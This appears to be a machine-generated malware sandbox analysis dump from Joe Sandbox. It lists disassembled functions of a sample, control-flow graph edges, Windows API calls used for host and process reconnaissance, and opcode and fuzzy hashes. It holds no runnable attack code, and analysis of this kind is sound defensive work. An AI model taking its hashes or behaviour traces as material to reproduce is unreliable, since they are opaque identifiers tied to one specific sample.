424ab2-424ab8 493->495 496 424acb-424ace call 429680 493->496 494->493 494->494 500 424ac0-424ac9 495->500 502 424ad3-424aef 496->502 497->486 498->489 499->489 500->496 500->500
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: +u7$Z8J*
                                                    • API String ID: 3545744682-3577212644
                                                    • Opcode ID: d0736012eb11d93e8aac0e09047d21296bc7183f2b0db3f091fb775f2bcfc723
                                                    • Instruction ID: 165055785b86ff1ff65636ea23ef9f62a0f191231776936cceeb048ae6667778
                                                    • Opcode Fuzzy Hash: d0736012eb11d93e8aac0e09047d21296bc7183f2b0db3f091fb775f2bcfc723
                                                    • Instruction Fuzzy Hash: 10328E70244B528AD729CB34D464BE3BBE1EF57308F484A6DD0FB8B682D778A406CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424084 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 676COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 680 424084-424098 682 4240f4-4240fd 680->682 683 42409a-4240b3 680->683 684 424147-424148 682->684 685 4240b5 683->685 686 4240ff 683->686 688 424150-424159 684->688 689 4240c0-4240f0 685->689 687 424101-424108 686->687 690 424117-42412d 687->690 691 42410a-424115 687->691 688->688 692 42415b-4241dd 688->692 689->689 693 4240f2 689->693 694 424130-424138 690->694 691->694 695 424228-424231 692->695 696 4241df 692->696 693->687 697 424140-424145 694->697 698 42413a-42413c 694->698 700 424233-424239 695->700 701 42424b-424257 695->701 699 4241e0-424226 696->699 697->684 698->684 702 42413e 698->702 699->695 699->699 703 424240-424249 700->703 704 42426b-424276 701->704 705 424259-42425f 701->705 702->692 703->701 703->703 708 424281-424323 call 438070 704->708 709 424278-42427e call 408700 704->709 706 424260-424269 705->706 706->704 706->706 715 424325 708->715 716 424378-424381 708->716 709->708 717 424330-424376 715->717 718 424383-424389 716->718 719 42439b-4243a7 716->719 717->716 717->717 720 424390-424399 718->720 721 4243bb-4243e9 call 408770 call 438070 719->721 722 4243a9-4243af 719->722 720->719 720->720 727 4243ee-4243f8 721->727 724 4243b0-4243b9 722->724 724->721 724->724 728 4243fb-42445d 727->728 729 4244a8-4244b1 728->729 730 42445f 728->730 732 4244b3-4244b9 729->732 733 4244cb-4244d7 729->733 731 424460-4244a6 730->731 731->729 731->731 734 4244c0-4244c9 732->734 735 4244eb-4244f9 call 438070 733->735 736 4244d9-4244df 733->736 734->733 734->734 739 4244fe-42456b GetComputerNameExA 735->739 738 4244e0-4244e9 736->738 738->735 738->738 740 4245b2-4245bb 739->740 741 42456d-42456f 739->741 743 4245db-4245e7 740->743 744 4245bd-4245c3 740->744 742 424570-4245b0 741->742 742->740 742->742 746 4245fb-424679 GetComputerNameExA 743->746 747 4245e9-4245ef 743->747 745 4245d0-4245d9 744->745 745->743 745->745 749 4246d2-4246db 746->749 750 42467b 746->750 748 4245f0-4245f9 747->748 748->746 748->748 752 4246fb-424707 749->752 753 4246dd-4246e3 749->753 751 424680-4246d0 750->751 751->749 751->751 754 42471b-424780 752->754 755 424709-42470f 752->755 756 4246f0-4246f9 753->756 759 424782 754->759 760 4247c0-4247c9 754->760 757 424710-424719 755->757 756->752 756->756 757->754 757->757 761 424790-4247be 759->761 762 4247eb-4247f7 760->762 763 4247cb-4247d1 760->763 761->760 761->761 765 42480b-42488a call 438070 762->765 766 4247f9-4247ff 762->766 764 4247e0-4247e9 763->764 764->762 764->764 771 4248e9-4248f2 765->771 772 42488c-42488f 765->772 767 424800-424809 766->767 767->765 767->767 774 4248f4-424902 771->774 775 42491d-42491f 771->775 773 424890-4248e7 772->773 773->771 773->773 776 424910-424919 774->776 777 424925-424933 775->777 776->776 778 42491b 776->778 779 424958-424961 777->779 778->777 780 424a01-424a04 779->780 781 424967-42496d 779->781 782 424a0a-424a50 780->782 783 424940-424942 781->783 784 42496f-424999 781->784 788 424a52 782->788 789 424aa5-424ab0 782->789 785 424947-424952 783->785 786 4249c0-4249ce 784->786 787 42499b-42499e 784->787 785->779 793 424a06-424a08 785->793 786->785 794 4249d4-4249fc 786->794 787->786 795 4249a0-4249be 787->795 790 424a60-424aa3 788->790 791 424ab2-424ab8 789->791 792 424acb-424ace call 429680 789->792 790->789 790->790 796 424ac0-424ac9 791->796 798 424ad3-424aef 792->798 793->782 794->785 795->785 796->792 796->796
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: P6D/
                                                    • API String ID: 3545744682-4117495492
                                                    • Opcode ID: 98d58fd9a2d5d080cfad4b43f2320fd71802cce227eaca84e7705199bef4817b
                                                    • Instruction ID: 24e67b7c81de9a4d5bd346c315e300abd70e7ef5a1aa41be01d77cb8b643429b
                                                    • Opcode Fuzzy Hash: 98d58fd9a2d5d080cfad4b43f2320fd71802cce227eaca84e7705199bef4817b
                                                    • Instruction Fuzzy Hash: 0F328D70204B928AD726CB34D494BE3BBE1EF57309F48496DD0FB8B282C7796446CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424087 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 650COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 799 424087-424098 801 4240f4-4240fd 799->801 802 42409a-4240b3 799->802 803 424147-424148 801->803 804 4240b5 802->804 805 4240ff 802->805 807 424150-424159 803->807 808 4240c0-4240f0 804->808 806 424101-424108 805->806 809 424117-42412d 806->809 810 42410a-424115 806->810 807->807 811 42415b-4241dd 807->811 808->808 812 4240f2 808->812 813 424130-424138 809->813 810->813 814 424228-424231 811->814 815 4241df 811->815 812->806 816 424140-424145 813->816 817 42413a-42413c 813->817 819 424233-424239 814->819 820 42424b-424257 814->820 818 4241e0-424226 815->818 816->803 817->803 821 42413e 817->821 818->814 818->818 822 424240-424249 819->822 823 42426b-424276 820->823 824 424259-42425f 820->824 821->811 822->820 822->822 827 424281-424323 call 438070 823->827 828 424278-42427e call 408700 823->828 825 424260-424269 824->825 825->823 825->825 834 424325 827->834 835 424378-424381 827->835 828->827 836 424330-424376 834->836 837 424383-424389 835->837 838 42439b-4243a7 835->838 836->835 836->836 839 424390-424399 837->839 840 4243bb-42445d call 408770 call 438070 838->840 841 4243a9-4243af 838->841 839->838 839->839 848 4244a8-4244b1 840->848 849 42445f 840->849 843 4243b0-4243b9 841->843 843->840 843->843 851 4244b3-4244b9 848->851 852 4244cb-4244d7 848->852 850 424460-4244a6 849->850 850->848 850->850 853 4244c0-4244c9 851->853 854 4244eb-42456b call 438070 GetComputerNameExA 852->854 855 4244d9-4244df 852->855 853->852 853->853 859 4245b2-4245bb 854->859 860 42456d-42456f 854->860 857 4244e0-4244e9 855->857 857->854 857->857 862 4245db-4245e7 859->862 863 4245bd-4245c3 859->863 861 424570-4245b0 860->861 861->859 861->861 865 4245fb-424679 GetComputerNameExA 862->865 866 4245e9-4245ef 862->866 864 4245d0-4245d9 863->864 864->862 864->864 868 4246d2-4246db 865->868 869 42467b 865->869 867 4245f0-4245f9 866->867 867->865 867->867 871 4246fb-424707 868->871 872 4246dd-4246e3 868->872 870 424680-4246d0 869->870 870->868 870->870 873 42471b-424780 871->873 874 424709-42470f 871->874 875 4246f0-4246f9 872->875 878 424782 873->878 879 4247c0-4247c9 873->879 876 424710-424719 874->876 875->871 875->875 876->873 876->876 880 424790-4247be 878->880 881 4247eb-4247f7 879->881 882 4247cb-4247d1 879->882 880->879 880->880 884 42480b-42488a call 438070 881->884 885 4247f9-4247ff 881->885 883 4247e0-4247e9 882->883 883->881 883->883 890 4248e9-4248f2 884->890 891 42488c-42488f 884->891 886 424800-424809 885->886 886->884 886->886 893 4248f4-424902 890->893 894 42491d-42491f 890->894 892 424890-4248e7 891->892 892->890 892->892 895 424910-424919 893->895 896 424925-424933 894->896 895->895 897 42491b 895->897 898 424958-424961 896->898 897->896 899 424a01-424a04 898->899 900 424967-42496d 898->900 901 424a0a-424a50 899->901 902 424940-424942 900->902 903 42496f-424999 900->903 907 424a52 901->907 908 424aa5-424ab0 901->908 904 424947-424952 902->904 905 4249c0-4249ce 903->905 906 42499b-42499e 903->906 904->898 912 424a06-424a08 904->912 905->904 913 4249d4-4249fc 905->913 906->905 914 4249a0-4249be 906->914 909 424a60-424aa3 907->909 910 424ab2-424ab8 908->910 911 424acb-424ace call 429680 908->911 909->908 909->909 915 424ac0-424ac9 910->915 917 424ad3-424aef 911->917 912->901 913->904 914->904 915->911 915->915
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: P6D/
                                                    • API String ID: 3545744682-4117495492
                                                    • Opcode ID: abb45cfd1665ca00273ef3f1b0106a62f4ffe98293d26439ae483960b4f7641a
                                                    • Instruction ID: 368cbe518a004d91c844a8922d65ddcbde3b63ca03ed0cce2041834018fe7c5f
                                                    • Opcode Fuzzy Hash: abb45cfd1665ca00273ef3f1b0106a62f4ffe98293d26439ae483960b4f7641a
                                                    • Instruction Fuzzy Hash: B9329B70604B528AD726CF34D8A4BE3BBE1EF56308F48496DD0FB8B282C7796446CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404740 Relevance: 5.5, Strings: 4, Instructions: 501COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 924 404740-404762 call 4086f0 927 404768-4047c6 924->927 928 404dfc-404e05 924->928 929 4047c8 927->929 930 4047cd-4047d5 call 4086f0 927->930 929->930 932 4047da-4047e3 930->932 933 404c45-404c4e call 408700 932->933 934 4047e9-4047fe 932->934 933->928 935 404811-40481a 934->935 938 404850-404854 935->938 939 40481c-404821 935->939 942 40487e-404888 938->942 940 404800 939->940 941 404823-404827 939->941 943 404802-40480b 940->943 944 404834-40483c 941->944 942->943 943->935 945 40488d-404894 943->945 946 404830-404832 944->946 947 40483e-404843 944->947 948 404896 945->948 949 40489b-4049e2 call 408770 * 3 945->949 946->944 950 404860-40486f call 408710 946->950 947->946 948->949 960 404a71-404a8e call 402fd0 949->960 961 4049e8-4049fb 949->961 950->940 955 404871-404879 950->955 955->942 967 404c53-404c54 960->967 968 404a94-404c15 960->968 963 404a43-404a6b call 402fd0 961->963 970 404a00-404a41 call 402fd0 963->970 971 404a6d-404a6f 963->971 969 404d1e-404d34 call 408700 * 2 967->969 972 404c76-404cad 968->972 973 404c17-404c20 968->973 969->928 970->960 970->963 971->970 974 404d02-404d08 972->974 975 404caf 972->975 976 404c22 973->976 977 404c34-404c3c 973->977 982 404d39-404d3b 974->982 983 404d0a-404d0d 974->983 981 404cb0-404d00 975->981 984 404d13-404d1d 976->984 985 404c30-404c32 977->985 986 404c3e-404c43 977->986 981->974 981->981 989 404db0-404df8 call 408700 982->989 990 404d3d-404d5c 983->990 991 404d0f-404d11 983->991 984->969 985->977 992 404c59-404c65 call 408710 985->992 986->985 989->928 995 404d5e-404d61 990->995 991->995 992->984 1000 404c6b-404c73 992->1000 995->989 998 404d63-404d67 995->998 1001 404d70-404dae 998->1001 1000->972 1001->989 1001->1001
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$IDAT$IEND$IHDR
                                                    • API String ID: 0-3181356877
                                                    • Opcode ID: fa1dcc08f83669751d98c45a89e33dd5cfaf22a636ecbc88bdf53c252e0362d9
                                                    • Instruction ID: 616d1399deee0a63aede7b3c3a380fc91103d69987d9aa92d37846ddb7d7f5fd
                                                    • Opcode Fuzzy Hash: fa1dcc08f83669751d98c45a89e33dd5cfaf22a636ecbc88bdf53c252e0362d9
                                                    • Instruction Fuzzy Hash: 6312EFB1A083448FD714CF29DC9076A7BE1EF85304F04857EEA849B392D779D909CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00415999 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x
                                                    • API String ID: 0-2363233923
                                                    • Opcode ID: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
                                                    • Instruction ID: 5e393febd6900f2cd60b323e8f13313b4837cbc21583559a6409e5a725ef4311
                                                    • Opcode Fuzzy Hash: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
                                                    • Instruction Fuzzy Hash: D071A1B15087818BD324CF24C49179BFBE1AFD5344F04892EE5D987382D639D949CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04265BD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 04265BFE
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 04265C1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4265000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: fe2ff150ffcf860bdd503148628e16cec70f7c1bf99ba9151d6964acf43553ff
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: A1F06231210711BBE7203AB9A88DB6E76ECAF49625F140568E647954C0DA70F8C54A61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00414C49 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp$F
                                                    • API String ID: 0-3477909023
                                                    • Opcode ID: 4dcbbf2a890ac3d374c1d3c84672f60673a4bb6946c2af3232e750e31ec7147f
                                                    • Instruction ID: 63a37f33c9773b82383deb7d5d266ebc64ff0dd11a4c80cef5b7f70997e62e81
                                                    • Opcode Fuzzy Hash: 4dcbbf2a890ac3d374c1d3c84672f60673a4bb6946c2af3232e750e31ec7147f
                                                    • Instruction Fuzzy Hash: 3121A3B96183418FD72CCF04D5A07BFB7E2AFC6708F54182DE9824B381C77998418B8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041C540 Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp
                                                    • API String ID: 0-1718216680
                                                    • Opcode ID: 074eb67a0e8625aa10ebf4850d1ba4eb172be33119ae63f38b080a0c1684276f
                                                    • Instruction ID: 443a94687d516e7fce39df943a97d10845015d358397bdc9878ab89e8d70c56d
                                                    • Opcode Fuzzy Hash: 074eb67a0e8625aa10ebf4850d1ba4eb172be33119ae63f38b080a0c1684276f
                                                    • Instruction Fuzzy Hash: AAA1FFB16443018BD714EF14CCA1BABB3E1FF95724F18491EE49287391E378E991CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00433CC0 Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrInitializeThunk.NTDLL(00438D36,005C003F,00000006,?,?,00000018,82818087,?,ZKA), ref: 00433CED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                    • Instruction ID: c1b3d4492825e51a2129b00b8cd86cf652684bda125d9e4c8d1b0ba6372c1005
                                                    • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                    • Instruction Fuzzy Hash: 74E0B675508212EBDA05DF45C14051FF7E2BFC4B14F55C88EE88433204C7B8AD45DB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004137C9 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: E&eb
                                                    • API String ID: 0-175690455
                                                    • Opcode ID: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
                                                    • Instruction ID: b8f5a8e3dcf807d80dac774d48860337069215117526bb8331fba5c9a38cef06
                                                    • Opcode Fuzzy Hash: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
                                                    • Instruction Fuzzy Hash: D931B1B1600B018BC725DF75C881AA7B3E2EF89314F18892DD0AAC7791E739F5818744
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004204B7 Relevance: .4, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab880d36f1e3ef79f070558864189974e201650b2fc4a9b0b2b78b6896b3a233
                                                    • Instruction ID: 33964663c1c25b7ce45e863f8a9a155cb930722d678f5f3125d4410b750ac910
                                                    • Opcode Fuzzy Hash: ab880d36f1e3ef79f070558864189974e201650b2fc4a9b0b2b78b6896b3a233
                                                    • Instruction Fuzzy Hash: C0E168B8600B018FD328CF25D994B27B7E5FB49308F84492DE49687B62E778F845CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00420CA0 Relevance: .4, Instructions: 371COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2cc86ad9dbefa929339bcf13688f90508a10795336458aca2642d26268c973c2
                                                    • Instruction ID: cfdd1eac7a752c9895d8910292a9cdf1f7f4ab7debb0d412fb0fa544ba69e460
                                                    • Opcode Fuzzy Hash: 2cc86ad9dbefa929339bcf13688f90508a10795336458aca2642d26268c973c2
                                                    • Instruction Fuzzy Hash: E3C1E2B1B083518FD314CF18D89072BB7E1EB95318F65492EF49587392E379D845CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00432010 Relevance: .3, Instructions: 300COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc7d688c4800d7467e5dec71b2816dc21eadf218d5a55f189bb6d84b232167a9
                                                    • Instruction ID: 2ad7af327792f261ff722e5f1da2ed22df55520e29869c472b0f36c5ca345de1
                                                    • Opcode Fuzzy Hash: dc7d688c4800d7467e5dec71b2816dc21eadf218d5a55f189bb6d84b232167a9
                                                    • Instruction Fuzzy Hash: E6A18A74600B018FE728CF25C994B17B7E1FB49304F14896DE5AA8BB91D779F905CB88
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00433D10 Relevance: .2, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7e0e2ec75268ac31b636375ce83739fad1511776ca76e724a2cd0e06c5c1aa90
                                                    • Instruction ID: be2f659581eec67e65d3233d53e9a8afebf0bf0bc19166d434e5d2f0596eea41
                                                    • Opcode Fuzzy Hash: 7e0e2ec75268ac31b636375ce83739fad1511776ca76e724a2cd0e06c5c1aa90
                                                    • Instruction Fuzzy Hash: C881BD70A083029BE314CF14C494B2BBBE1FB89759F64991DF4855B392D378DE45CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422458 Relevance: .2, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
                                                    • Instruction ID: 4c680af95089d7f0266524c2a1d5a39c2a6c001387b2c56eb0ee7e33708b2ad5
                                                    • Opcode Fuzzy Hash: 5b5f4f53ba419257f2c99d53f27223171b991d6193ee5832ef2f56c753d8d8e1
                                                    • Instruction Fuzzy Hash: FB5168742007119BD724CF28C861B62B3F1FF4A318F548A5DE8968B7A1D779B845CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004357CA Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
                                                    • Instruction ID: e2717505d55db8640db63e85cfe19b0466bde158ad5ac179620a4d1d884c2fba
                                                    • Opcode Fuzzy Hash: a8b148af547a59128bb71e64be0d4d12e62a739c123e6228515b622e6ca986d7
                                                    • Instruction Fuzzy Hash: 124179746083029BE708DF04C594B2FB7E6BFDA718F68591DE0858B341D338ED169B9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004359E2 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
                                                    • Instruction ID: c1c90ed302c5d13420f5bca68ce5e1754aac3df7c22edd8dd8ca255a1c6ae94c
                                                    • Opcode Fuzzy Hash: a2911f6e714779df75f77f4e9c30eb5bfbff7d856db354c347998ed89740c5d8
                                                    • Instruction Fuzzy Hash: 2C216D746083029BE310DF04C994B1FB7F2BBC5B08F245A1DE1949B396C779DC059B9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00429597 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
                                                    • Instruction ID: e757895f7bb26a2b2320ca7d8dd105008f44d0bd9ca2c0e57cc8f66670818d05
                                                    • Opcode Fuzzy Hash: 71eeffcf46f1b7fa9e56d8600949dbbcd25cfd78c9bd91e554dbcc0743bda1b8
                                                    • Instruction Fuzzy Hash: 43E0E5B06083018FC314EF28D591B5BBBE0FB89304F12C82DE49A8B254D779A944CB45
